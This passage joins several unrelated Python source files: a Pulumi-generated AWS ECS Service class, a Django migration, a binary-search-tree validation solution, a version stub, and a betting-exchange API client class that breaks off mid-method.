The maximum number of `service_registries` blocks is `1`. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags :param pulumi.Input[str] task_definition: The family and revision (`family:revision`) or full ARN of the task definition that you want to run in your service. Required unless using the `EXTERNAL` deployment controller. If a revision is not specified, the latest `ACTIVE` revision is used. :param pulumi.Input[bool] wait_for_steady_state: If `true`, the provider will wait for the service to reach a steady state (like `aws ecs wait services-stable`) before continuing. Default `false`. """ if __name__ is not None: warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning) opts = __opts__ if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = dict() __props__['capacity_provider_strategies'] = capacity_provider_strategies __props__['cluster'] = cluster __props__['deployment_controller'] = deployment_controller __props__['deployment_maximum_percent'] = deployment_maximum_percent __props__['deployment_minimum_healthy_percent'] = deployment_minimum_healthy_percent __props__['desired_count'] = desired_count __props__['enable_ecs_managed_tags'] = enable_ecs_managed_tags __props__['enable_execute_command'] = enable_execute_command __props__['force_new_deployment'] = force_new_deployment __props__['health_check_grace_period_seconds'] = health_check_grace_period_seconds __props__['iam_role'] = iam_role __props__['launch_type'] = launch_type __props__['load_balancers'] = load_balancers __props__['name'] = name __props__['network_configuration'] = network_configuration __props__['ordered_placement_strategies'] = ordered_placement_strategies __props__['placement_constraints'] = placement_constraints __props__['platform_version'] = platform_version __props__['propagate_tags'] = propagate_tags __props__['scheduling_strategy'] = scheduling_strategy __props__['service_registries'] = service_registries __props__['tags'] = tags __props__['task_definition'] = task_definition __props__['wait_for_steady_state'] = wait_for_steady_state super(Service, __self__).__init__( 'aws:ecs/service:Service', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, capacity_provider_strategies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCapacityProviderStrategyArgs']]]]] = None, cluster: Optional[pulumi.Input[str]] = None, deployment_controller: Optional[pulumi.Input[pulumi.InputType['ServiceDeploymentControllerArgs']]] = None, deployment_maximum_percent: Optional[pulumi.Input[int]] = None, deployment_minimum_healthy_percent: Optional[pulumi.Input[int]] = None, desired_count: Optional[pulumi.Input[int]] = None, enable_ecs_managed_tags: Optional[pulumi.Input[bool]] = None, enable_execute_command: Optional[pulumi.Input[bool]] = None, force_new_deployment: Optional[pulumi.Input[bool]] = None, health_check_grace_period_seconds: Optional[pulumi.Input[int]] = 
None, iam_role: Optional[pulumi.Input[str]] = None, launch_type: Optional[pulumi.Input[str]] = None, load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceLoadBalancerArgs']]]]] = None, name: Optional[pulumi.Input[str]] = None, network_configuration: Optional[pulumi.Input[pulumi.InputType['ServiceNetworkConfigurationArgs']]] = None, ordered_placement_strategies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceOrderedPlacementStrategyArgs']]]]] = None, placement_constraints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePlacementConstraintArgs']]]]] = None, platform_version: Optional[pulumi.Input[str]] = None, propagate_tags: Optional[pulumi.Input[str]] = None, scheduling_strategy: Optional[pulumi.Input[str]] = None, service_registries: Optional[pulumi.Input[pulumi.InputType['ServiceServiceRegistriesArgs']]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, task_definition: Optional[pulumi.Input[str]] = None, wait_for_steady_state: Optional[pulumi.Input[bool]] = None) -> 'Service': """ Get an existing Service resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceCapacityProviderStrategyArgs']]]] capacity_provider_strategies: The capacity provider strategy to use for the service. Can be one or more. Defined below. :param pulumi.Input[str] cluster: ARN of an ECS cluster :param pulumi.Input[pulumi.InputType['ServiceDeploymentControllerArgs']] deployment_controller: Configuration block containing deployment controller configuration. Defined below. :param pulumi.Input[int] deployment_maximum_percent: The upper limit (as a percentage of the service's desiredCount) of the number of running tasks that can be running in a service during a deployment. Not valid when using the `DAEMON` scheduling strategy. :param pulumi.Input[int] deployment_minimum_healthy_percent: The lower limit (as a percentage of the service's desiredCount) of the number of running tasks that must remain running and healthy in a service during a deployment. :param pulumi.Input[int] desired_count: The number of instances of the task definition to place and keep running. Defaults to 0. Do not specify if using the `DAEMON` scheduling strategy. :param pulumi.Input[bool] enable_ecs_managed_tags: Specifies whether to enable Amazon ECS managed tags for the tasks within the service. :param pulumi.Input[bool] enable_execute_command: Specifies whether to enable Amazon ECS Exec for the tasks within the service. :param pulumi.Input[bool] force_new_deployment: Enable to force a new task deployment of the service. This can be used to update tasks to use a newer Docker image with same image/tag combination (e.g. `myimage:latest`), roll Fargate tasks onto a newer platform version, or immediately deploy `ordered_placement_strategy` and `placement_constraints` updates. :param pulumi.Input[int] health_check_grace_period_seconds: Seconds to ignore failing load balancer health checks on newly instantiated tasks to prevent premature shutdown, up to 2147483647. Only valid for services configured to use load balancers. 
:param pulumi.Input[str] iam_role: ARN of the IAM role that allows Amazon ECS to make calls to your load balancer on your behalf. This parameter is required if you are using a load balancer with your service, but only if your task definition does not use the `awsvpc` network mode. If using `awsvpc` network mode, do not specify this role. If your account has already created the Amazon ECS service-linked role, that role is used by default for your service unless you specify a role here. :param pulumi.Input[str] launch_type: The launch type on which to run your service. The valid values are `EC2` and `FARGATE`. Defaults to `EC2`. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceLoadBalancerArgs']]]] load_balancers: A load balancer block. Load balancers documented below. :param pulumi.Input[str] name: The name of the service (up to 255 letters, numbers, hyphens, and underscores) :param pulumi.Input[pulumi.InputType['ServiceNetworkConfigurationArgs']] network_configuration: The network configuration for the service. This parameter is required for task definitions that use the `awsvpc` network mode to receive their own Elastic Network Interface, and it is not supported for other network modes. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceOrderedPlacementStrategyArgs']]]] ordered_placement_strategies: Service level strategy rules that are taken into consideration during task placement. List from top to bottom in order of precedence. Updates to this configuration will take effect next task deployment unless `force_new_deployment` is enabled. The maximum number of `ordered_placement_strategy` blocks is `5`. Defined below. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePlacementConstraintArgs']]]] placement_constraints: rules that are taken into consideration during task placement. Updates to this configuration will take effect next task deployment unless `force_new_deployment` is enabled. Maximum number of `placement_constraints` is `10`. Defined below. :param pulumi.Input[str] platform_version: The platform version on which to run your service. Only applicable for `launch_type` set to `FARGATE`. Defaults to `LATEST`. More information about Fargate platform versions can be found in the [AWS ECS User Guide](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/platform_versions.html). :param pulumi.Input[str] propagate_tags: Specifies whether to propagate the tags from the task definition or the service to the tasks. The valid values are `SERVICE` and `TASK_DEFINITION`. :param pulumi.Input[str] scheduling_strategy: The scheduling strategy to use for the service. The valid values are `REPLICA` and `DAEMON`. Defaults to `REPLICA`. Note that [*Tasks using the Fargate launch type or the `CODE_DEPLOY` or `EXTERNAL` deployment controller types don't support the `DAEMON` scheduling strategy*](https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_CreateService.html). :param pulumi.Input[pulumi.InputType['ServiceServiceRegistriesArgs']] service_registries: The service discovery registries for the service. The maximum number of `service_registries` blocks is `1`. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags :param pulumi.Input[str] task_definition: The family and revision (`family:revision`) or full ARN of the task definition that you want to run in your service. Required unless using the `EXTERNAL` deployment controller. If a revision is not specified, the latest `ACTIVE` revision is used. 
:param pulumi.Input[bool] wait_for_steady_state: If `true`, the provider will wait for the service to reach a steady state (like `aws ecs wait services-stable`) before continuing. Default `false`. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = dict() __props__["capacity_provider_strategies"] = capacity_provider_strategies __props__["cluster"] = cluster __props__["deployment_controller"] = deployment_controller __props__["deployment_maximum_percent"] = deployment_maximum_percent __props__["deployment_minimum_healthy_percent"] = deployment_minimum_healthy_percent __props__["desired_count"] = desired_count __props__["enable_ecs_managed_tags"] = enable_ecs_managed_tags __props__["enable_execute_command"] = enable_execute_command __props__["force_new_deployment"] = force_new_deployment __props__["health_check_grace_period_seconds"] = health_check_grace_period_seconds __props__["iam_role"] = iam_role __props__["launch_type"] = launch_type __props__["load_balancers"] = load_balancers __props__["name"] = name __props__["network_configuration"] = network_configuration __props__["ordered_placement_strategies"] = ordered_placement_strategies __props__["placement_constraints"] = placement_constraints __props__["platform_version"] = platform_version __props__["propagate_tags"] = propagate_tags __props__["scheduling_strategy"] = scheduling_strategy __props__["service_registries"] = service_registries __props__["tags"] = tags __props__["task_definition"] = task_definition __props__["wait_for_steady_state"] = wait_for_steady_state return Service(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="capacityProviderStrategies") def capacity_provider_strategies(self) -> pulumi.Output[Optional[Sequence['outputs.ServiceCapacityProviderStrategy']]]: """ The capacity provider strategy to use for the service. Can be one or more. Defined below. """ return pulumi.get(self, "capacity_provider_strategies") @property @pulumi.getter def cluster(self) -> pulumi.Output[str]: """ ARN of an ECS cluster """ return pulumi.get(self, "cluster") @property @pulumi.getter(name="deploymentController") def deployment_controller(self) -> pulumi.Output[Optional['outputs.ServiceDeploymentController']]: """ Configuration block containing deployment controller configuration. Defined below. """ return pulumi.get(self, "deployment_controller") @property @pulumi.getter(name="deploymentMaximumPercent") def deployment_maximum_percent(self) -> pulumi.Output[Optional[int]]: """ The upper limit (as a percentage of the service's desiredCount) of the number of running tasks that can be running in a service during a deployment. Not valid when using the `DAEMON` scheduling strategy. """ return pulumi.get(self, "deployment_maximum_percent") @property @pulumi.getter(name="deploymentMinimumHealthyPercent") def deployment_minimum_healthy_percent(self) -> pulumi.Output[Optional[int]]: """ The lower limit (as a percentage of the service's desiredCount) of the number of running tasks that must remain running and healthy in a service during a deployment. """ return pulumi.get(self, "deployment_minimum_healthy_percent") @property @pulumi.getter(name="desiredCount") def desired_count(self) -> pulumi.Output[Optional[int]]: """ The number of instances of the task definition to place and keep running. Defaults to 0. Do not specify if using the `DAEMON` scheduling strategy. 
""" return pulumi.get(self, "desired_count") @property @pulumi.getter(name="enableEcsManagedTags") def enable_ecs_managed_tags(self) -> pulumi.Output[Optional[bool]]: """ Specifies whether to enable Amazon ECS managed tags for the tasks within the service. """ return pulumi.get(self, "enable_ecs_managed_tags") @property @pulumi.getter(name="enableExecuteCommand") def enable_execute_command(self) -> pulumi.Output[Optional[bool]]: """ Specifies whether to enable Amazon ECS Exec for the tasks within the service. """ return pulumi.get(self, "enable_execute_command") @property @pulumi.getter(name="forceNewDeployment") def force_new_deployment(self) -> pulumi.Output[Optional[bool]]: """ Enable to force a new task deployment of the service. This can be used to update tasks to use a newer Docker image with same image/tag combination (e.g. `myimage:latest`), roll Fargate tasks onto a newer platform version, or immediately deploy `ordered_placement_strategy` and `placement_constraints` updates. """ return pulumi.get(self, "force_new_deployment") @property @pulumi.getter(name="healthCheckGracePeriodSeconds") def health_check_grace_period_seconds(self) -> pulumi.Output[Optional[int]]: """ Seconds to ignore failing load balancer health checks on newly instantiated tasks to prevent premature shutdown, up to 2147483647. Only valid for services configured to use load balancers. """ return pulumi.get(self, "health_check_grace_period_seconds") @property @pulumi.getter(name="iamRole") def iam_role(self) -> pulumi.Output[str]: """ ARN of the IAM role that allows Amazon ECS to make calls to your load balancer on your behalf. This parameter is required if you are using a load balancer with your service, but only if your task definition does not use the `awsvpc` network mode. If using `awsvpc` network mode, do not specify this role. If your account has already created the Amazon ECS service-linked role, that role is used by default for your service unless you specify a role here. """ return pulumi.get(self, "iam_role") @property @pulumi.getter(name="launchType") def launch_type(self) -> pulumi.Output[str]: """ The launch type on which to run your service. The valid values are `EC2` and `FARGATE`. Defaults to `EC2`. """ return pulumi.get(self, "launch_type") @property @pulumi.getter(name="loadBalancers") def load_balancers(self) -> pulumi.Output[Optional[Sequence['outputs.ServiceLoadBalancer']]]: """ A load balancer block. Load balancers documented below. """ return pulumi.get(self, "load_balancers") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name of the service (up to 255 letters, numbers, hyphens, and underscores) """ return pulumi.get(self, "name") @property @pulumi.getter(name="networkConfiguration") def network_configuration(self) -> pulumi.Output[Optional['outputs.ServiceNetworkConfiguration']]: """ The network configuration for the service. This parameter is required for task definitions that use the `awsvpc` network mode to receive their own Elastic Network Interface, and it is not supported for other network modes. """ return pulumi.get(self, "network_configuration") @property @pulumi.getter(name="orderedPlacementStrategies") def ordered_placement_strategies(self) -> pulumi.Output[Optional[Sequence['outputs.ServiceOrderedPlacementStrategy']]]: """ Service level strategy rules that are taken into consideration during task placement. List from top to bottom in order of precedence. 
Updates to this configuration will take effect next task deployment unless `force_new_deployment` is enabled. The maximum number of `ordered_placement_strategy` blocks is `5`. Defined below. """ return pulumi.get(self, "ordered_placement_strategies") @property @pulumi.getter(name="placementConstraints") def placement_constraints(self) -> pulumi.Output[Optional[Sequence['outputs.ServicePlacementConstraint']]]: """ rules that are taken into consideration during task placement. Updates to this configuration will take effect next task deployment unless `force_new_deployment` is enabled. Maximum number of `placement_constraints` is `10`. Defined below. """ return pulumi.get(self, "placement_constraints") @property @pulumi.getter(name="platformVersion") def platform_version(self) -> pulumi.Output[str]: """ The platform version on which to run your service. Only applicable for `launch_type` set to `FARGATE`. Defaults to `LATEST`. More information about Fargate platform versions can be found in the [AWS ECS User Guide](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/platform_versions.html). """ return pulumi.get(self, "platform_version") @property @pulumi.getter(name="propagateTags") def propagate_tags(self) -> pulumi.Output[Optional[str]]: """ Specifies whether to propagate the tags from the task definition or the service to the tasks. The valid values are `SERVICE` and `TASK_DEFINITION`. """ return pulumi.get(self, "propagate_tags") @property @pulumi.getter(name="schedulingStrategy") def scheduling_strategy(self) -> pulumi.Output[Optional[str]]: """ The scheduling strategy to use for the service. The valid values are `REPLICA` and `DAEMON`. Defaults to `REPLICA`. Note that [*Tasks using the Fargate launch type or the `CODE_DEPLOY` or `EXTERNAL` deployment controller types don't support the `DAEMON` scheduling strategy*](https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_CreateService.html). """ return pulumi.get(self, "scheduling_strategy") @property @pulumi.getter(name="serviceRegistries") def service_registries(self) -> pulumi.Output[Optional['outputs.ServiceServiceRegistries']]: """ The service discovery registries for the service. The maximum number of `service_registries` blocks is `1`. """ return pulumi.get(self, "service_registries") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]: """ Key-value map of resource tags """ return pulumi.get(self, "tags") @property @pulumi.getter(name="taskDefinition") def task_definition(self) -> pulumi.Output[Optional[str]]: """ The family and revision (`family:revision`) or full ARN of the task definition that you want to run in your service. Required unless using the `EXTERNAL` deployment controller. If a revision is not specified, the latest `ACTIVE` revision is used. """ return pulumi.get(self, "task_definition") @property @pulumi.getter(name="waitForSteadyState") def wait_for_steady_state(self) -> pulumi.Output[Optional[bool]]: """ If `true`, the provider will wait for the service to reach a steady state (like `aws ecs wait services-stable`) before continuing. Default `false`. 
""" return pulumi.get(self, "wait_for_steady_state") def translate_output_property(self, prop): return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop # Generated by Django 3.2 on 2022-02-02 13:07 from django.db import migrations, models import django.db.models.deletion import django_countries.fields class Migration(migrations.Migration): dependencies = [ ('profiles', '0001_initial'), ('checkout', '0001_initial'), ] operations = [ migrations.AddField( model_name='order', name='user_profile', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='orders', to='profiles.userprofile'), ), migrations.AlterField( model_name='order', name='country', field=django_countries.fields.CountryField(max_length=2), ), ] kkcookies99/UAST class Solution: def dfs(self, node: TreeNode, ans: List[int]): if not node: return self.dfs(node.left, ans) ans.append(node.val) self.dfs(node.right, ans) def XXX(self, root: TreeNode) -> bool: ans = [] self.dfs(root, ans) if len(ans) <= 1: return True for i in range(1, len(ans)): if ans[i] <= ans[i - 1]: return False return True bluesky-api/python-client0 try: import importlib.metadata as importlib_metadata except ModuleNotFoundError: import importlib_metadata __version__ = importlib_metadata.version("blueskyapi") import requests from typing import Union, List from .baseendpoint import BaseEndpoint from .. import resources from ..filters import market_filter, time_range from ..utils import clean_locals class Betting(BaseEndpoint): """ Betting operations. """ URI = "SportsAPING/v1.0/" def list_event_types( self, filter: dict = market_filter(), locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.EventTypeResult]]: """ Returns a list of Event Types (i.e. Sports) associated with the markets selected by the MarketFilter. :param dict filter: The filter to select desired markets :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.EventTypeResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listEventTypes") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.EventTypeResult, elapsed_time, lightweight, ) def list_competitions( self, filter: dict = market_filter(), locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.CompetitionResult]]: """ Returns a list of Competitions (i.e., World Cup 2013) associated with the markets selected by the MarketFilter. 
:param dict filter: The filter to select desired markets :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.CompetitionResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listCompetitions") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.CompetitionResult, elapsed_time, lightweight, ) def list_time_ranges( self, filter: dict = market_filter(), granularity: str = "DAYS", session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.TimeRangeResult]]: """ Returns a list of time ranges in the granularity specified in the request (i.e. 3PM to 4PM, Aug 14th to Aug 15th) associated with the markets selected by the MarketFilter. :param dict filter: The filter to select desired markets :param str granularity: The granularity of time periods that correspond to markets selected by the market filter :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.TimeRangeResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listTimeRanges") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.TimeRangeResult, elapsed_time, lightweight, ) def list_events( self, filter: dict = market_filter(), locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.EventResult]]: """ Returns a list of Events (i.e, Reading vs. Man United) associated with the markets selected by the MarketFilter. :param dict filter: The filter to select desired markets :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.EventResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listEvents") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.EventResult, elapsed_time, lightweight ) def list_market_types( self, filter: dict = market_filter(), locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.MarketTypeResult]]: """ Returns a list of market types (i.e. MATCH_ODDS, NEXT_GOAL) associated with the markets selected by the MarketFilter. :param dict filter: The filter to select desired markets :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.MarketTypeResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listMarketTypes") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.MarketTypeResult, elapsed_time, lightweight, ) def list_countries( self, filter: dict = market_filter(), locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.CountryResult]]: """ Returns a list of Countries associated with the markets selected by the MarketFilter. 
:param dict filter: The filter to select desired markets :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.CountryResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listCountries") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.CountryResult, elapsed_time, lightweight ) def list_venues( self, filter: dict = market_filter(), locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.VenueResult]]: """ Returns a list of Venues (i.e. Cheltenham, Ascot) associated with the markets selected by the MarketFilter. :param dict filter: The filter to select desired markets :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.VenueResult] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listVenues") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.VenueResult, elapsed_time, lightweight ) def list_market_catalogue( self, filter: dict = market_filter(), market_projection: list = None, sort: str = None, max_results: int = 1, locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.MarketCatalogue]]: """ Returns a list of information about published (ACTIVE/SUSPENDED) markets that does not change (or changes very rarely). :param dict filter: The filter to select desired markets :param list market_projection: The type and amount of data returned about the market :param str sort: The order of the results :param int max_results: Limit on the total number of results returned, must be greater than 0 and less than or equal to 10000 :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.MarketCatalogue] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listMarketCatalogue") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.MarketCatalogue, elapsed_time, lightweight, ) def list_market_book( self, market_ids: list, price_projection: dict = None, order_projection: str = None, match_projection: str = None, include_overall_position: bool = None, partition_matched_by_strategy_ref: bool = None, customer_strategy_refs: list = None, currency_code: str = None, matched_since: str = None, bet_ids: list = None, locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.MarketBook]]: """ Returns a list of dynamic data about markets. 
Dynamic data includes prices, the status of the market, the status of selections, the traded volume, and the status of any orders you have placed in the market :param list market_ids: One or more market ids :param dict price_projection: The projection of price data you want to receive in the response :param str order_projection: The orders you want to receive in the response :param str match_projection: If you ask for orders, specifies the representation of matches :param bool include_overall_position: If you ask for orders, returns matches for each selection :param bool partition_matched_by_strategy_ref: If you ask for orders, returns the breakdown of matches by strategy for each selection :param list customer_strategy_refs: If you ask for orders, restricts the results to orders matching any of the specified set of customer defined strategies :param str currency_code: A Betfair standard currency code :param str matched_since: If you ask for orders, restricts the results to orders that have at least one fragment matched since the specified date :param list bet_ids: If you ask for orders, restricts the results to orders with the specified bet IDs :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.MarketBook] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listMarketBook") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.MarketBook, elapsed_time, lightweight ) def list_runner_book( self, market_id: str, selection_id: int, handicap: float = None, price_projection: dict = None, order_projection: str = None, match_projection: str = None, include_overall_position: bool = None, partition_matched_by_strategy_ref: bool = None, customer_strategy_refs: list = None, currency_code: str = None, matched_since: str = None, bet_ids: list = None, locale: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.MarketBook]]: """ Returns a list of dynamic data about a market and a specified runner. 
Dynamic data includes prices, the status of the market, the status of selections, the traded volume, and the status of any orders you have placed in the market :param unicode market_id: The unique id for the market :param int selection_id: The unique id for the selection in the market :param double handicap: The projection of price data you want to receive in the response :param dict price_projection: The projection of price data you want to receive in the response :param str order_projection: The orders you want to receive in the response :param str match_projection: If you ask for orders, specifies the representation of matches :param bool include_overall_position: If you ask for orders, returns matches for each selection :param bool partition_matched_by_strategy_ref: If you ask for orders, returns the breakdown of matches by strategy for each selection :param list customer_strategy_refs: If you ask for orders, restricts the results to orders matching any of the specified set of customer defined strategies :param str currency_code: A Betfair standard currency code :param str matched_since: If you ask for orders, restricts the results to orders that have at least one fragment matched since the specified date :param list bet_ids: If you ask for orders, restricts the results to orders with the specified bet IDs :param str locale: The language used for the response :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.MarketBook] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listRunnerBook") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.MarketBook, elapsed_time, lightweight, # todo MarketBook? ) def list_current_orders( self, bet_ids: list = None, market_ids: list = None, order_projection: str = None, customer_order_refs: list = None, customer_strategy_refs: list = None, date_range: dict = time_range(), order_by: str = None, sort_dir: str = None, from_record: int = None, record_count: int = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[dict, resources.CurrentOrders]: """ Returns a list of your current orders. :param list bet_ids: If you ask for orders, restricts the results to orders with the specified bet IDs :param list market_ids: One or more market ids :param str order_projection: Optionally restricts the results to the specified order status :param list customer_order_refs: Optionally restricts the results to the specified customer order references :param list customer_strategy_refs: Optionally restricts the results to the specified customer strategy references :param dict date_range: Optionally restricts the results to be from/to the specified date, these dates are contextual to the orders being returned and therefore the dates used to filter on will change to placed, matched, voided or settled dates depending on the orderBy :param str order_by: Specifies how the results will be ordered. 
If no value is passed in, it defaults to BY_BET :param str sort_dir: Specifies the direction the results will be sorted in :param int from_record: Specifies the first record that will be returned :param int record_count: Specifies how many records will be returned from the index position 'fromRecord' :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: resources.CurrentOrders """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listCurrentOrders") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.CurrentOrders, elapsed_time, lightweight ) def list_cleared_orders( self, bet_status: str = "SETTLED", event_type_ids: list = None, event_ids: list = None, market_ids: list = None, runner_ids: list = None, bet_ids: list = None, customer_order_refs: list = None, customer_strategy_refs: list = None, side: str = None, settled_date_range: dict = time_range(), group_by: str = None, include_item_description: bool = None, locale: str = None, from_record: int = None, record_count: int = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[dict, resources.ClearedOrders]: """ Returns a list of settled bets based on the bet status, ordered by settled date. :param str bet_status: Restricts the results to the specified status :param list event_type_ids: Optionally restricts the results to the specified Event Type IDs :param list event_ids: Optionally restricts the results to the specified Event IDs :param list market_ids: Optionally restricts the results to the specified market IDs :param list runner_ids: Optionally restricts the results to the specified Runners :param list bet_ids: If you ask for orders, restricts the results to orders with the specified bet IDs :param list customer_order_refs: Optionally restricts the results to the specified customer order references :param list customer_strategy_refs: Optionally restricts the results to the specified customer strategy references :param str side: Optionally restricts the results to the specified side :param dict settled_date_range: Optionally restricts the results to be from/to the specified settled date :param str group_by: How to aggregate the lines, if not supplied then the lowest level is returned :param bool include_item_description: If true then an ItemDescription object is included in the response :param str locale: The language used for the response :param int from_record: Specifies the first record that will be returned :param int record_count: Specifies how many records will be returned from the index position 'fromRecord' :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: resources.ClearedOrders """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listClearedOrders") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.ClearedOrders, elapsed_time, lightweight ) def list_market_profit_and_loss( self, market_ids: list, include_settled_bets: bool = None, include_bsp_bets: bool = None, net_of_commission: bool = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[list, List[resources.MarketProfitLoss]]: """ Retrieve profit and loss for a given list of OPEN markets. 
:param list market_ids: List of markets to calculate profit and loss :param bool include_settled_bets: Option to include settled bets (partially settled markets only) :param bool include_bsp_bets: Option to include BSP bets :param bool net_of_commission: Option to return profit and loss net of users current commission rate for this market including any special tariffs :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: list[resources.MarketProfitLoss] """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "listMarketProfitAndLoss") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.MarketProfitLoss, elapsed_time, lightweight, ) def place_orders( self, market_id: str, instructions: list, customer_ref: str = None, market_version: dict = None, customer_strategy_ref: str = None, async_: bool = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[dict, resources.PlaceOrders]: """ Place new orders into market. :param str market_id: The market id these orders are to be placed on :param list instructions: The number of place instructions :param str customer_ref: Optional parameter allowing the client to pass a unique string (up to 32 chars) that is used to de-dupe mistaken re-submissions :param dict market_version: Optional parameter allowing the client to specify which version of the market the orders should be placed on, e.g. "{'version': 123456}" :param str customer_strategy_ref: An optional reference customers can use to specify which strategy has sent the order :param bool async_: An optional flag (not setting equates to false) which specifies if the orders should be placed asynchronously :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: resources.PlaceOrders """ params = clean_locals(locals()) method = "%s%s" % (self.URI, "placeOrders") (response, response_json, elapsed_time) = self.request(method, params, session) return self.process_response( response_json, resources.PlaceOrders, elapsed_time, lightweight ) def cancel_orders( self, market_id: str = None, instructions: list = None, customer_ref: str = None, session: requests.Session = None, lightweight: bool = None, ) -> Union[dict, resources.CancelOrders]: """ Cancel all bets OR cancel all bets on a market OR fully or partially cancel particular orders on a market. :param str market_id: If marketId and betId aren't supplied all bets are cancelled :param list instructions: All instructions need to be on the same market :param str customer_ref: Optional parameter allowing the client to pass a unique string (up to 32 chars) that is used to de-dupe mistaken re-submissions :param requests.session session: Requests session object :param bool lightweight: If True will return dict not a resource :rtype: resources.CancelOrders """ params = clean_locals(locals()) method = 